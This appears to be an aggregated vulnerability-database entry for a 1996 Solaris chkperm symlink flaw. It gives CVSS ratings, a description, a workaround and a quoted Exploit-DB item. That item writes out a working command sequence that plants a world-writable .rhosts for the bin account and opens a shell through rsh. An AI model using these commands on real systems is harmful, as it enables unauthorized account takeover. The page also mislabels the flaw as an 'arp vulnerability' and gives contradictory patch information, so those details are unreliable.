Published: 1999-12-01 00:00:00
Revised: 2008-09-09 08:36:03

[Original] Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.

[CNNVD] Solaris arp vulnerability (CNNVD-199912-010)


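- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]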

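- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources

- Vulnerability information

Solaris arp vulnerability
Low risk  Other
1999-12-01 00:00:00 2005-10-20 00:00:00

- Advisories and patches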

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

- Vulnerability information (19235)

Solaris <= 7.0 chkperm Vulnerability (EDBID:19235)
solaris local
1996-12-05 Verified
0 Kevin L Prigge
N/A

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4.

chkperm must be run in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from which you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it. It also works the same with just 'chkperm -l'; you can set the environment variable VMSYS to anything.

You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result. 

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)


- Vulnerability information

Solaris FACE chkperm VMSYS Environmental Variable Symlink Arbitrary File Disclosure
Local Access Required Information Disclosure, Input Manipulation
Loss of Confidentiality Workaround, Patch / RCS
Exploit Public

- Vulnerability description

Solaris chkperm utility contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious user sets the VMSYS variable to a user writeable directory, creates a symlink to .facerc, then executes chkperm which will disclose the first five lines of the file given as an argument resulting in a loss of confidentiality.

- Timeline

1996-12-05 Unknown
1996-12-05 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch (#109392-01) to address this vulnerability. In addition, this issue can be worked around by restricting permission to chkperm: chmod ug-s /usr/vmsys/bin/chkperm

- References

- Vulnerability author